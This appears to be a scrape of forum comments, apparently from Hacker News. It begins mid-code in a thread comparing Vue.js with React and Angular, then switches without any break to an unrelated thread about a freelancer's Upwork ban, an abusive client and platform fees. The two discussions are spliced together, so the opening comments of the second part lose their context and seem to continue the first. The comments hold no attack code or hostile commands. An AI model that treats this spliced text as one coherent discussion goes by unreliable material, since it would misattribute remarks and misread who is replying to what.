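      }
    };
    </script>

    <style scoped>
    button { font-weight: bold; }
    </style>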

I can quickly edit the template to alter my component's DOM structure, style it with scoped CSS, and change its dynamic behavior in the script tag. Like the suite of Jade/Coffee/Stylus? Add a lang attribute to each tag and you are good to go. Awesome stuff.

I know that Gitlab is written in pretty traditional Rails' style and takes advantage of turbolinks. Did you run into any difficulties adding a framework that likes to "own the page" like most single page app frameworks do? I've found these can often end up fighting with turbolinks and similar libraries.

The company I work for has an app built with Angular 1.x (the backend is .NET). We started sensing that Angular was not the best choice, especially when working with 3rd-party components. There are other factors too, but they have already been mentioned in other comments. Long story short, we had enough of wrapping everything in $timeout and started looking at alternatives.

After some consideration, we were left with choosing between Vue.js and React. Coming from Angular, where the biggest plus was two-way binding, Vue.js had a slight advantage. We then converted a "module" (not in the JS sense) using both frameworks.

In our experience, when switching from Angular 1.x to Vue.js, there's a sense of not changing much (we were still "declaring" logic in the templates) but nonetheless doing things better, simpler and faster. The React version needed a bit more time investment (we had no prior experience on our team; a colleague from another project helped us a bit by showing us how he had implemented a project using React). In the end we chose React due to the wonderful combination of it and TypeScript. We suddenly had no more string templates and refactoring was a breeze (there are, of course, other benefits as well).

What I'm trying to say is that, if you have Angular 1.x experience, it's easier to switch to Vue. I had fun porting the "module" to Vue and would have happily worked with it if the team had not chosen React. I consider "mixins" to be one of its killer features (they would have made a lot of things easier with our app). Having said that, I don't consider React that hard to grasp and don't regret that the team picked it over Vue. As long as you remember the lifecycle, programming with it can be fun and easy. The React/TypeScript combination compensates for the lack of mixins and two-way binding (I know, MobX, but I'm talking about the "vanilla" versions).

vue-cli is great too. It just works, and creates a really well-thought-out initial project that can build to a single static HTML/JS/CSS bundle. Or it can easily be turned into a typical Express app. This makes Vue.js combine well with serverless.

> He pointed out that when a major software company releases their secret sauce, there is going to be hype. Devs think to themselves, 'That company writes JS differently than me, and they are prominent and successful. Is their way of writing JS better than mine? And therefore must I adopt it?'

Ahaha. No, believe me, I won't. That's ironic coming from GitLab. I mean, I love that company, but their front-end sucks big time and it's slow as a snail.

I too gravitate toward Vue.js for its simplicity, but I wonder if React's mind share and community size "trump" simplicity. For example, if you're hiring for a front-end position, you'll probably get more candidates familiar with, and expert in, React than Vue.js.

> I talk to a lot of JavaScript devs and I find it really interesting that the ones who spend the most time in Angular tend to not know JavaScript nearly as well. I don't want that to be me or our devs. Why should we write "not JavaScript?"

Just pick something, internet, and build a good structure on top of it. All this jQuery-level bikeshedding is nice for your ad widgets and minimalistic web apps, but it won't help me replace proper GUI toolkits. And sadly, that seems to be what's in demand...

I'll cope with your ill-designed template language (heck, if I can cope with HTML, I can cope with anything) or your JS async abstraction du jour (promises, async await, that * crap), just give me something on the level of Tk or Swing. I feel like all we got in the last decade beyond e.g. Seaside is a bit less flicker and some more useless animations (looking at you, Material Design buttons).

I'm in the process of learning React, so I don't have any strong opinions of my own yet. I've read through the Vue.js "Getting Started" docs and it does look very intuitive/simple. However, what motivates me to learn React is the fact that I can build an app once and then use React Native to create an iOS and Android app. I'm assuming this isn't a requirement for Jacob and the GitLab team, but I'm wondering if his decision would be the same if he had to support native apps as well?

Can anyone compare Vue with Knockout? In the early days of Angular etc I saw a lot of people saying they chose Knockout, and were much happier than with one of the heavier frameworks. I found its simplicity very appealing too, but it seems clear now that it's not a mainstream choice. It feels to me like a dead end. The last time I looked (a year ago?) the semi-official data mapping extension had lost its maintainer. So is Vue another shot at the same approach? What are the important differences?

It's amazing that a one-person project (well, it's more than one person now, but the core part is really just one guy) can develop such a beautiful system that actually feels better than Angular 2 and React, and who knows how many people are behind those two projects.

My experience started at work where we used it on an internal project. The ease of use was insane, we had something reactive and easy to work on in no more than 10 minutes. React has always had too big of a learning curve for us, so it'd have been a vanilla JS/jQuery mess if we hadn't found Vue.

We're now using it on almost any project we start (they're all very UI driven).

I met Evan You at Laracon earlier in the year, he's an awesome dude and has put a lot of thought into everything Vue. Thanks again for making Vue! :)

I had a look at Vue after a long time, and then at Weex, a React Native alternative using Vue.js instead of React. Backed by Alibaba and actively developed, it looked really good. But a look at the issues made me a bit afraid to use it: the primary language used for discussion, suggestions, etc. is Chinese. Documentation, however, is available in English.

I like the ideas of the choo framework https://github.com/yoshuawuyts/choo it's very close to vanilla js, which makes it less of a lock-in, while still bringing lessons learned and practices from redux/elm-architecture.

I am currently using it (the 4.0 branch) in a project and enjoying it.

I wish there were an equivalent to something like ember-fastboot for out-of-the-box server side rendering, though. (server-side rendering for those who care about progressive enhancement in the browser, not isomorphism).

These discussions almost never mention cycle.js. I haven't done front end in a couple of years but whenever I read something from the author of the framework, I'm pretty impressed and the choices they made seem very promising.

I tried Vue.js a few months ago and liked it a lot. But now, I need to rewrite my apps and I decided to go the Cordova road with Ionic 2, because Ionic 2 is, imho, unparalleled in its quality.

Ionic 2 uses Angular 2, and I wish there were some Ionic 2 + Vue.js bindings. However, after working with it for a bit, I found that Angular 2 is actually quite simple, with the benefit of using TypeScript out of the box.

Before you dismiss Angular 2, give it a try. It's fundamentally different from Angular 1: easier to learn, less complex, faster results.

How does Vue.js handle high latency issues? With Angular 1.x I've always had issues where the GUI will "flash" while the HTML is loading and the angular.js has not yet finished loading on a slow connection (so you might briefly see all of these {{message1}} {{message2}} etc on the page). I'm curious how Vue.js handles that case or if it has the same problem.
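For what it's worth, Vue's answer to that specific flash of uncompiled {{ }} templates (assuming you keep templates in the page rather than precompiling them) is the v-cloak directive: the element stays hidden until Vue has compiled it.

    <style>
      [v-cloak] { display: none; }
    </style>

    <div id="app" v-cloak>
      {{ message }}  <!-- hidden until Vue takes over -->
    </div>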

Also, it makes the case that Angular2 is "enterprise" because many use TypeScript with it. But, TypeScript is optional in both Vue and Angular2, so people could just as easily make the argument that Vue is "enterprise" because it supports TypeScript.

Finally, it's true that Google uses/develops Angular2, so that's some significant backing. If you want to see who's using Vue:

Why is it that the first instinct of some developers is to go out and 'choose' a framework? Even before you know whether the thing you're building is going to be around for a while, people automatically think they need a framework to do anything these days.

Does it feel good to let someone else make critical decisions for you, instead of thinking for yourself? Can all projects really be distilled down into some javascript framework?

The benefits of using a framework these days are rapidly evaporating, as what is trendy today likely won't be in a few years anyway. And the truth is, after so many months or years or commits, the benefits of the framework's structure start to fade away as the application becomes more customized and bespoke. All the complexity is in the actual application functionality, not the tiny little savings and poor abstractions that come with a framework.

I've worked for large tech companies and small alike. It always goes the same way. Some developer who is super opinionated and passionate props up their framework of choice, or does some kind of perfunctory analysis of the "current best" of whatever is available at the time, and the other, more submissive developers go along with him. It has more to do with group dynamics than with actual technical merit, or what is best for the product or business.

Then, once the system has become a ball of mud, the "lead" guy leaves. Or he proudly exclaims there's a new hotness in town, and that we need to rewrite our application in this new thing because it's faster, or better, or you get to type less. Or some other such bullshit. He'll then give demos of how fast you can make a simple app that has nothing to do with anything -- like a simple TODO list -- "look how fast it renders!" he'll exclaim (of course forgetting to tell everyone the first page load or stale cache hit is actually worse).

I personally hate giving up the freedom to decide on my own abstractions, how to structure my code, how to organize my APIs, etc., for a supposed one-size-fits-all solution created by someone I've never even met or talked to, and for code that I haven't reviewed.

If it's a library that's doing something useful and providing a great API, like some 3D graphics, drawing primitives, ML, a database engine, etc., that's a different story. That is useful software that actually does stuff. But for "rendering" (I say that lightly, because the browser does the rendering and layout; a framework is merely a middle-man) forms and buttons and keeping the state of an application? Or telling you how and where to put source files, and name things? It's your job as a developer to come up with those conventions and to build an application that is 1:1 with the problem domain.

But the copyright information (Copyright by Stanford University) has been stripped from all the files and replaced with "Copyright (c) 2015 Upwork". No reference to Stanford CS or anything like that, just copy and paste.

Which is very wrong in my book.

I wrote them a message and after some fruitless exchanges with 4 or 5 different support people, I've decided to just let it go.

The incompetence of the interview assignment, coupled with robotic support answers quickly convinced me not to waste any more time with this bunch.

Totally agree with the article, and I am more than certain that such acts and extortionate behaviour are widespread on the platform.

It seems it is part of their business model to allow clients in developed countries to find people in developing countries (many with weak legal systems and corruption) to commit illegal acts (violations of both public and private law). Just look at how many jobs involve rewriting, scraping, penetration testing (really a guise for hacking other people's sites), or modifying existing copyrighted content to circumvent laws.

Upwork as middleman profits -- and turns a blind eye to all this corruption -- since cross-border police investigations are so difficult to manage when dealing with corrupt countries.

In my case, I had my competitors procuring hackers off Upwork to take down my site. We found out because one person who was contacted on Upwork to bring my site down actually contacted me via my site and provided screenshots and other evidence. There was literally a job posted requesting contractors to take my site down.

We raised this with Upwork. They did nothing.

Guess what they said?

Their customer support asked if I had proof that my site had been hacked by the specific person who posted the job on Upwork, and whether I had suffered financial loss as a result of the hacking! It wasn't enough for their client to procure contractors on the platform to commit an illegal act. They wanted proof that I suffered financial loss!!

However, I can say that we are considering a civil suit against them. It would be interesting to see how this impacts their brand.

Note: Please forgive the messy and unstructured writing. I've been writing it while walking the streets of Central London shopping for X-mas gifts.

Apologies for the capitals, ladies and gentlemen. Please can I remind all of you to be Civil.

I've just received an email from the man himself, suggesting that I'm getting people to give his FB page 1* reviews and to spam his email. He's threatened (implied) legal action directly against me.

Publicly let me say, for the record (Hopefully it doesn't get wiped), that I do not encourage any of the aforementioned behavior, nor do I condone it.

He's currently posting on Reddit and generally still acting like a massive douche over email to me, after all of this. So the above was quite hard for me to write, but remember there may well be a lot of people working at said company who have families and lives beyond this.

I think the worst part about this is that I wasn't even surprised at any point in the story. Anyone who has been a freelancer has dealt with random, uncalled-for threats from clients to give you a bad review or try to get your account suspended. It's the reason I gave up on working on platforms like Upwork and Freelancer almost immediately.

Building a personal network is a far easier way to find contract work, and you'll make more money in the end while creating real relationships that will help you foster your career.

I'm sorry this happened to you, and I'm super glad you revealed this person's name publicly. Good form.

From the Upwork FAQ: "You'll need to download and use the Upwork Team App. This tool includes the Work Diary, which ensures you are guaranteed payment. By taking work-in-progress screenshots every 10 minutes, it provides proof to your clients that you are hard at work."

Screenshots every 10 minutes? You mean... screenshots of MY SCREEN every 10 minutes? That was what made me close their website and totally forget about it until I saw this submission on HN today.

Shadi, I work at Upwork and your post about your experience makes us feel terrible. We've reopened your case and are investigating it much more thoroughly. We hope to have a response to you quickly. If you have any questions or want to provide more details, please email me at rpearson(at)upwork.com. We care very much about our freelancer community and want to make this right. - Rich

Shadi Al'lababidi replied:

Rich, it shouldn't take a post like this for you (Upwork) to give someone special treatment. I know there are thousands of others like me that rely on your platform (most, far more than myself, for much larger percentages of their income). In some cases this can very literally mean the difference between putting food on the table and not. They may not be able to spread the message like I can, or speak English in such a manner. They may not be able to drum up enough attention, so they go unnoticed. It's no skin off Upwork's back, until it turns into a PR mess. Hence why you're commenting.

Let's cut the shit, Rich. I've got 2 tickets open and have been messaging every day for the last 11 days. Nothing, nada. Just, "We've banned you and you can't know why." (For those reading this, yes, they do say you cannot know why, so as not to let on to why they ban you.) I've tweeted at you, nothing.

Now, I have roughly 75% of a month's worth of Upwork money stuck on there. If I were someone else, or someone without other income streams, what would I do? What could I possibly tell my incumbent clients? Shit, what am I even going to tell my incumbent clients? "You've just left me without a month's worth of wages and a big fuck you, there's nothing you can do."

So, I do not want any special treatment. I will not contact you via email. This is an integral problem with Upwork itself and I will highlight it as much as I possibly can, even if that means losing the money and the reputation on there that I've been building up over the last year.

And please, Rich, I'm a bloody marketer for Christ's sake. Don't come at me with that standard company mumbo jumbo, "it makes us feel terrible." You're just being patronising.

Absolutely disgusting behavior by Kevin. I'm kinda hoping that it's just incompetence at UpWork that caused this, and not that Kevin actually knows someone at UpWork. But in any case, that's why I stopped freelancing through UpWork and similar platforms, and started building a solid client base who know that I'm always there to help, for the right price of course. Plus I write somewhat technical and topical blog posts about the technologies I work with (mainly video encoding, processing, P2P CDNs, etc.) and that seems to pull clients in more easily than UpWork would.

Looking at some of their responses to reviews on Facebook (https://www.facebook.com/wiperecord/reviews/) it would appear the attitude is part of their company culture. Amazing, for a company that bills itself as trying to help people overcome their past, it appears they are simply in the business of taking advantage of a vulnerable group.

Long-time user of Elance and then Upwork here. I can attest that what occurred in this story is common.

The problem that Upwork doesn't realize is that without an active and happy freelancing demographic, clients will go elsewhere. Historically, Upwork has made it a priority to cater to the client. This is evident given their JSS. For those of you who are not familiar with the JSS, it is a score that companies/clients use to hire freelancers. Now, one would assume the score is based on past work with clients. That is not all the score accounts for: timeliness in responding to invites, the number of long-term clients you maintain, the number of clients you hassle (yes, Upwork actively goes out and tells its freelancers to hassle their clients to leave them feedback -- the responsibility falls on the freelancer and only the freelancer), etc.

Thus, when clients don't leave feedback (for whatever reason), you are dinged. Upwork won't tell you by how much exactly so let me give you an example.

12 months ago, my score was 92% (Top Rated). A client hired me. We went over the terms of the contract (number of revisions, not working on weekends, etc.). Two weeks into the project, the client started to deviate from the terms. I let them know and they began to get pissy. This happens all the time, as Upwork has created a platform where the clients hold all of the power, and they know it.

A week later the contract wrapped up, and I managed to make the client happy, as they left me a 4.7/5 on my profile and a positive review. Clients are also able to leave private feedback the freelancer can never see. When the JSS score updated (every two weeks, I believe; mind you, I had not worked any other jobs since that one), my score went from 92% to 71%! A 21-point drop.

Suffice it to say, for the past 12 months, dozens and dozens of clients later (most with positive reviews), I am now only sitting in the low 80s for my JSS.

In conclusion, Upwork is the worst example of an online marketplace for freelancers who have a backbone and are not afraid to tell a client how it is. After all, we are hired for our expertise and when a client proceeds to tell us how to do our job, it poisons the freelancing community.

I think that the freelance marketplace is not good for the freelance economy as a whole. A lot of the time, it creates a race to the bottom as far as pricing, and you have to compete with workers overseas undercutting you at every corner.

When I first got started freelancing, I used eLance (which is now UpWork). I had a similar experience with a client: they suspended my account for 2+ months, and I won the dispute in the end. If I hadn't had my own clients outside of eLance, I would have been screwed and unable to pay my rent. After that, I stopped using the service and haven't looked back 4 years later.

I have a friend who actually knows someone on the executive leadership team at UpWork; I just emailed him with your article. Hopefully something positive can come of that. I really hate it when all-around bad human beings go around trying to make people's lives harder.

Shameless plug: I run a new company, CodeGophers, that competes with Upwork. We get a lot of unhappy Upwork customers.

Unlike Upwork our service has a quality guarantee, so clients aren't forced to manage freelancers, and deal with low quality work. It's kind of like a product manager and freelancer combo, and overall it's much easier for the client.

If you're unhappy with Upwork, please give us a shot. You can see our site at https://codegophers.com, or start a task by writing in at:

Never, ever give a price break without a scope change. Apart from the obvious $/hr benefits, it's a great way to figure out if the person on the other end of the line is an abusive psychopath. A professional will understand that you're trying to help them achieve realistic value for their budget. A psychopath will take it as a personal affront and become transparently manipulative and/or abusive. This is a great time to cut off contact, before it escalates to the level shown here.

Sorry to hear about this, Shadi. Kevin is one hell of an asshole. I try to refrain from using profanity, but this man utterly deserves it. I will do my best to let every other freelancer know about this and recommend they stay as far away from Upwork as they can.

What I learned from this is not to ignore the warning signs of a psychopath client. Because you can easily get sucked in to a bad situation regardless of your good intentions, and you can't rely on the marketplace to resolve these disputes in your favor. This scenario can also play out on other freelancing sites, and it can also happen if you solicit clients directly and they turn out to be well-connected.

"$100 an hour is more than our CEO makes so I'm not sure we can budget $1500 for this".

Don't bill hourly! I know this sounds like a very silly example (it's not even logically coherent) but reasoning like this gets deployed all the time, even with sophisticated clients. People have anchoring price points for hourly rates that they don't have for other billing structures. Fixing this to make more money is literally as simple as "switch to daily billing".

A freelance marketplace is very much against the idea of freelancing. You are basically working for the marketplace with little freedom to design the actual work processes your way. Everything is geared towards getting positive reviews and thus getting more work through the marketplace. A vicious, underpaid circle.

Sure, it works great for building contacts when you are not really visible yet. After you land a few gigs and have work, references and talent to show for it, you should really abandon it ASAP. Better yet, don't start with it at all, because the gamified nature will lure you into doing more gigs.

Very sorry to hear it. I've employed many people on oDesk, then Upwork, over the years and have almost always had great experiences with freelancers. In the rare case when I did have an issue, customer support wasn't very good from the hiring side either, FYI.

Also, I think they shot themselves in the foot with the big price hike. Previously, freelancers and I would just keep using their platform throughout our working relationships. Now we use it like a dating app: meet a freelancer, work a project or two to build trust, and then leave the platform and handle payments on our own.

As another freelancer who has been there, done that (not at Upwork, but at three other platforms, namely Freelancer.com, PeoplePerHour and Fiverr [yes, Fiverr -- and unlikely as it may sound, I found individual clients there who placed thousands of dollars' worth of work with me]), I can only and totally identify and sympathize with the OP here.

Of the three platforms above, I've found PPH to be the best in terms of overall mix/quality of clients as well as the platform's fairness (such as it may be) towards me (the freelancer).

After over two years of doing this almost full time, here is my takeaway:

The platforms have no love for the freelancers. Their first and foremost loyalty is (almost exclusively) reserved for the buyers, even to the point of being downright unreasonable in terms of favoring the buyers.

While I've been fortunate enough not to end up with the terminal outcome (yet), I have come close a few times, and every time that happens it is such an emotionally upsetting and disappointing experience that I feel I could write a whole book about it, but then I lose the inclination after a while.

Such then, is the state of affairs and I guess there's little anyone (well at least I, at any rate) can do about it.

Just so you know, you inadvertently included Kevin's email address in one of the screenshots. You blurred it out from the "from" section, but it's also showing in a "flagged as spam" yellow box. I'm sure this wasn't your intention.

1. People that try to hire freelancers don't have the decency to consider that freelancers have to pay fees, taxes and other markups (e.g. transfer fees).

2. The usual "you quote me X, but my budget is X/2 tops," and the failure to realize that if Z per hour over N hours = X, I can just quote Z/2, double the number of hours, and still get X (worked example below).

When an experienced developer in his field gives you a 15-hour quote, it doesn't mean that it's an easy job that can be done by anybody in that time frame; if that were the case, you would have done it yourself already.
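To make point 2 concrete (made-up numbers):

    quoted:           15 h x $100/h = $1,500
    "half the rate":  30 h x  $50/h = $1,500   (same total, twice the calendar time)

Halving the rate without shrinking the scope doesn't save the client anything; it just stretches the schedule.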

Even before the threats made to Upwork, I feel the 'client' was trying to trick the freelancer.

- Snag a freelancer without providing a spec up front.
- Once some desperate freelancer signs on, flood them with tons of work.
- If the freelancer tries to back out, threaten to file a complaint with Upwork. Since the freelancer was desperate enough to sign on, the client probably assumes they will be desperate enough to suck it up and finish the work.
- Repeat. Hence 40 previous jobs.

> I'm not going to talk about the impossibility of competition they offer due to being seriously undercut by those that live in countries with lower costs of living.

As a freelancer/contractor working exclusively for customers that have large budgets and pay a lot I'd advise against ever using such platforms.

You are going to compete with very cheap labour (and often low quality services) and businesses will expect that and pay accordingly.

Even if you have no projects lined up it's better to create your own small service or product which you can use later to advertise effectively what kind of value you could create for prospective customers. (go to local events and get into contact with future customers this way)

It's also interesting to note that globalisation is pushed so heavily at all levels of our society, although we can clearly see that it sucks for the majority living in rich countries.

Most people here probably do recognise (at least subconsciously) that it's impossible for them to compete with people doing the same job in a third-world country, even if those people do a worse job. They make up for it by offering their services at such a low rate that they offset this easily. (Some of them live in countries where you can easily feed, clothe and house a family on $200 a month; it's impossible to compete with that.)

You could argue, of course, that it's great for third-world countries (it was), lifting many people out of poverty, but would you want to become poor in the process? (Take a look at Detroit; this could be our future.)

Google, Apple and other large IT corporations (or really any large corp that needs IT services) are of course interested in lowering their cost of labour (which is a legitimate interest for them), so make no mistake: what they push for politically in this case is certainly not in your interest.

Thank you for sharing your experience; I am closing my account. But is there any similar (or other) service you would recommend I use? As a student I work with a company through this platform. Thanks in advance.

Does anybody else find it odd that this man's real name is: Shadi Al'lababidi

However, his UpWork profile is: Shadi Paterson

I've seen this done quite a bit when companies (especially American ones) ship their support overseas, but are either too embarrassed to let their workers use their real names, or justify such actions by saying "some Americans will find it difficult to say your name" (or, in other implicit scenarios, because a Muslim-sounding -- or X-sounding -- name will associate you with terrorism/other-ism).

Imagine the world we live in, where in order to do a job (or get work), you have to literally change your REAL name to appeal to the demographic.

Whether Shadi did this of his own accord, or was instructed to by UpWork to 'passively appeal' to hiring clients, it is quite a shocker to see it YET AGAIN.

I purchase talent from Upwork on occasion. But less and less. On the buy side, I think the personal network works better. And with so many jerks on the buy side, it scares the talent away. Death spiral.

Is it possible to have a community like this without the BS? How to stop it?

I had a similar experience. I used to have a 4.8+ rating on Upwork, then accepted a job which went bad largely due to a poor and inaccurate spec provided by the client. He actually went to my company website, found the team members' emails and sent a message to everybody castigating me. I basically begged him to stop doing any further damage. Upwork always gives its clients the benefit of the doubt, because they know they'll always have a cheap source of freelancers from countries where the cost of living is low.

Terrible story, all my support to you. It is completely true that the protection we have is very limited and that we must be VERY VERY selective with clients, even if this means rejecting offers, even if this means not earning money. I try to give qualified answers, and I ask for qualified customers who are able to communicate and competent enough to discuss requirements. Otherwise I let them go away; "Too busy on other projects, thanks" is my mantra on Upwork. It takes discipline and will, but being entangled in a poisonous relationship with someone who can harm you is far worse. Push this story around, it is the best vengeance.

It's a real shame. I used Elance for around four years (as a client, not a freelancer). This was before Elance merged with oDesk and became Upwork.

I'm sure Elance had issues. But I noticed a marked uptick in problems when the Upwork migration happened. The Elance interface was old school, but very functional.

Upwork was confusing. The migration was a mess and made me a freelancer by default, as I also had a minor freelancer profile on Elance that I had never used. It took weeks to resolve.

The desktop app... actually, I don't remember the issue, but it led to me leaving the platform entirely. I think messages took ages to load.

I will eventually look for new freelancers, and I'll need to figure out a replacement when I do. It sounds like Upwork is not a great place to be for a freelancer now and that means the quality ones will be elsewhere.

As a client, I want freelancers to be able to make money, and to denounce bad clients. By catering excessively to clients, Upwork is going to select for toxic clients.

Upwork seems to always take sides with the company/client. It is a terrible practice and very scary for freelancers who use Upwork as their primary income generator. I had a few challenges with Upwork and it took weeks to resolve them. It seems freelancers have to walk on eggshells around Upwork support or clients when issues arise. I guess there is a huge opportunity for the next Upwork.

Although sites like Upwork make money from both sides (probably more from freelancers), they are likely to support those offering work.

Perhaps their line of thought goes like: Freelancers would always outnumber those offering work. Even if some walk away or are forced out, it doesn't matter as long as we manage to keep those offering work on board.

The goal here should be to sue, not just to make things public. Why not get a lawyer the moment your account won't be reopened? Upwork owes you over $1000. A client is seriously trying to harm your public image, which may result in losing customers/business. Either point alone would be enough to talk to a lawyer. Together they are clear suing material.

If you only go public, you actually open yourself up to getting sued. Also, cheaters and bullies will see that you didn't sue and will therefore see you as an easy mark. Normal schoolyard logic applies, except that as a grownup you don't hit them in the face, you sue.

From the employer side. We're a platinum employer on UpWork with probably close to $100,000 spent on the platform and maybe 70 completed jobs. Tons of reviews calling us one of the best employers on UpWork.

Right after oDesk merged with eLance to form UpWork, the platform rolled out its new "job success" score and sidelined star ratings (which was how it'd previously determined employer and contractor quality).

We typically hire multiple contractors to small test jobs, and let them know these are test jobs. We then keep the best one or two on, and the rest we thank for their work, give them a good review (assuming they at least tried), and end the project.

In this case, right after UpWork rolled out its "job success rate" score, we had a few trial freelancers we brought on who simply did not even start their projects or respond to communications. So we ended those jobs and marked them "unsuccessful."

Within maybe a week, I received a "letter from the principal"-type email from UpWork letting me know that we had too many unsuccessful jobs and UpWork would be monitoring our account to make sure we were following sound hiring principles.

I assumed this was probably a situation where we had 3 job success ratings and 2 of them were unsuccessful, or something like this, since they'd just rolled this out. Whereas we had something like 70 five star ratings (and a couple of four star ratings) built up over the years.

I wrote to UpWork asking what this was about, pointing out that we have tons of five star reviews and this job success thing was brand new, and we just got a form letter back saying, in effect, "just be more careful."

So, now, we make every job "successful" when it ends, regardless how it ended, and are very careful to end jobs in a cheerful way with freelancers and tell them, "Okay! Job 5-starred and marked 'successful'!" in hopes they'll be inclined to do the same. It's not about accurate information. It's about not losing access to the platform.

We do hiring on other platforms as well. Guru, Freelancer, PeoplePerHour. Freelancer and PPH are comparable to UpWork in terms of fees (UpWork's a little bit higher). The PPH interface is pretty good; Freelancer's is not as good, and the quality of contractors on Freelancer leaves something to be desired compared to UpWork (though PPH is pretty good here too). Guru has great contractors and its rates are almost half of UpWork's (12.5% instead of 22.5%), but its interface is something out of 2009 and employers aren't even able to end their contracts with freelancers. It's just a downright byzantine system to use.

So, like it or not, we seem stuck with UpWork for now, and UpWork can run a crummier service than it used to in the oDesk days and charge twice as much for it because, well, they're the only game in town, and that's the market economy. We've moved what work we can off it (e.g., we use 99designs for design stuff now, and have found some terrific contractors we've gone back to repeatedly from them), but UpWork's still the best general place.

Maybe someone else will come along with a better service, cheaper. I kind of hoped PPH would be that, but they charge comparable rates, so maybe that's just what the market rate is for the middle man service between employers and freelancers. Wish they'd plow some of the new capital into better tech though. The new site design is worse than what it was before the upgrade, and often gets stuck loading in the browser. Still better than Guru though.

Back when Elance was a separate site, I created a script to automatically withdraw funds from my Elance account to my bank account. I posted it to their forums and promptly had my account locked "after a routine review". They unlocked it after I jumped through some hoops, but I think the same shoot-first attitude clearly survived the merger with upwork.

What's interesting about the timing of this story is that I have recently been playing around with Upwork for some freelance work and the issue I am having is actually a different one.

I have come to realize that there is a fundamental problem with the marketplace itself. I don't think it matches clients to freelancers properly.

I did two exercises. I posted a few positions as a 'buyer', and I got a lot of spam (i.e. non-personalized, crap responses to my position/gig/job, where it was obvious they never read it). I got more than I expected, which made it difficult to weed through and find a freelancer I wanted to work with. Granted, I didn't want the typical "low-ball" freelancer. I was looking for a freelancer who knew what they were doing. Alas, I was unsatisfied with the results and ended up not finding what I was looking for.

I also responded to gigs as a Ruby developer. What's remarkable is that it is literally very, very difficult to get any work, much less the type of work I would like (high-value work with a handful of clients, potentially doing on-going work).

I first started off with a relatively high-ish hourly rate for UpWork ($80/hr for someone with 8 years of Ruby & Rails experience and 15+ years of web development experience overall). Because I had no 'history' with the platform, that didn't work. I filled out my portfolio and responded to each job in a very custom way, detailing the specifics of how I would tackle each job I was submitting a proposal for. This took much longer than just spamming, and was more mentally taxing, but I figured I could make up for my lack of an Upwork track record by putting more into my proposals. No dice.

I then dropped my rates (down to as low as $40/hr) just to test, still no dice. I didn't even get responses.

Then, I assumed that maybe my proposals weren't robust enough or maybe I wasn't communicating my capabilities in my portfolio properly enough, aka I was being hit with a 'portfolio tax'.

So to get over this, I decided to actually bid on fixed budget tasks that were very specific in what they want and overlapped with specific stuff I have done in the past -- specifically "B2B Lead Discovery" or "Website Scraping" for something.

I recently have been playing around with scraping websites for different types of leads, particularly B2B, and so this suited me perfectly.

I then started applying to some of these with not just the specifics of what I had done and how I would tackle their specific task; I would even send them sample results for leads similar to what they were asking for. So say someone was looking for wedding planners from each state (an actual job posting), needing the $CompanyName, $Website, $Email, $PhoneNumber and $Address. I had recently done this exact thing for accountants, so I replied explaining what I had done and how I could help them, and I sent them a CSV file with a list of sample accountants, along with a picture of my script producing those results.

In one case, I crawled the specific website they wanted crawled, showed them pictures of the script doing it, and then gave them a suggestion based on what they were looking for and what I found. There was a disconnect between what they wanted and what could technically be scraped from the website (they wanted email addresses for all users on MySpace, to be exact). So I informed them that unless MySpace has an API that gives out this information, and unless they were after the email addresses people post within comments on the music throughout the site, this was a waste of time, and I provided proof from my script.

Suffice it to say, I did a lot of work on each proposal. I did about 7-10 of these very specific proposals for scrapers, and about 15-20 other specific, but not as specific, proposals. I also didn't change the price they asked for. So if they said their budget was $10, I replied with all of the above on a $10 budget. This is crazy, I know... but I did it just to experiment.

The results? Not even 1 reply. Not even 1. You can see screenshots here [1].

Yes, my portfolio on Upwork could be weak (although I doubt it, because I think it looks pretty robust), my profile could be a deterrent (because the language I use is a mismatch for what these clients are looking for), and my rates could be high relative to the rest of the marketplace, but the real issue is the overall non-response from ANY of the 20+ proposals I submitted over the period of a week.

Something feels fundamentally broken there, especially considering my experience on the other side of the marketplace.

I believe that there is some middle ground between the "elitist" Toptal and "broken" UpWork. So, I would like to try an experiment.

Do you have any high value ($30K+ -- note this is a floor, just to weed out inappropriate clients) development projects that you would like done? Either generic projects where no tech stack is specified or Ruby and Rails jobs for starters. I won't specify the types of projects, but something where you would prefer a "high-quality" developer help you see it to fruition rather than the cheapest developer you can find. Perhaps you have tried other developer services/gig boards and are unhappy with the process.

Do you want a product manager to help drive the entire process for you, from beginning to end?

If this sounds interesting to you, please send me an email to: marc+hnexperiment@mymvpblueprint.com.

If I can find a pattern for how to find these types of projects consistently, I would love to work with other developers to fill these needs. Until then though, let the experimentation begin!

Ugh, what a terrible, terrible client. But I think the title draws the wrong conclusion. I've personally been a client on Upwork over the last year, paying several developers to work on open source software, and all parties have been very happy with the experience. I think one should think about this incident in the broader context:

* It's clear Upwork support screwed this case up. But one should keep in mind that resolving disputes between two people who each complain the other is a criminal (as in this case) is a really hard problem. The US justice system often gets it wrong (sometimes egregiously). While it sucks when it happens, I think one should expect platforms like Upwork to screw up sometimes too.

* Dealing with people trying to cheat is a fact of life in any business. I've heard horror stories in the freelancing world of clients deciding not to pay a freelancer for months of work, freelancers pretending to do work, etc. Often, the wronged party is unable to get the dispute resolved satisfactorily, especially if the two parties are in different countries. Any marketplace the size of Upwork (https://www.upwork.com/about/ says $1B in jobs annually) will have a large absolute number of both bad clients and bad freelancers (there are certainly tons of bad bosses and bad employees in America, lots of bad taxi drivers, etc.). At least with a platform like Upwork or Uber, there's a reputation system where bad actors get bad reviews and eventually stop getting matched with other people. I'm willing to bet that this employer is a jerk to the people he hires outside Upwork, too.

* This particular client's behavior is extremely bad in several ways. But at least the client had bad reviews on the platform. Do business with bad people at your peril! They will figure out how to screw you.

* I had thought the "screenshots every 10 minutes" feature of Upwork was just an annoying invasion of privacy, until I had a freelancer report 50 hours of work fraudulently (i.e. he didn't post any work starting ~50 hours before I stopped paying him), make a bunch of increasingly unrealistic excuses that he would post his work soon once he got back from a vacation or whatever, and eventually disappear. After investigating, Upwork banned the freelancer, but their terms of service don't allow them to recover money already paid since we weren't using the screenshots feature. While I was upset and frustrated by it, I've also seen employees in the US stop working and hope to get a month or two of free pay before they get fired, and it's basically the exact same thing. Given the larger picture of Upwork having 3M jobs/year, mostly for relatively small amounts of money, there are probably a lot of disputes, and I think you should expect to have a significant fraction of disputes decided in a way where at least one of the parties leaves the dispute upset because the decision was wrong (the US civil justice system certainly has that property!). And keep in mind: a 5-20% fee on projects with a <$1000 average size doesn't pay for a lot of manual dispute resolution. Things like screenshots of emails can be forged; who knows what other fabricated evidence the client gave to Upwork support to help their side of the case. The screenshot mechanism is Upwork's current best solution for making dispute resolution efficient, and I think it does help: I haven't had fraud issues with those freelancers who are using it (and Upwork's ToS do 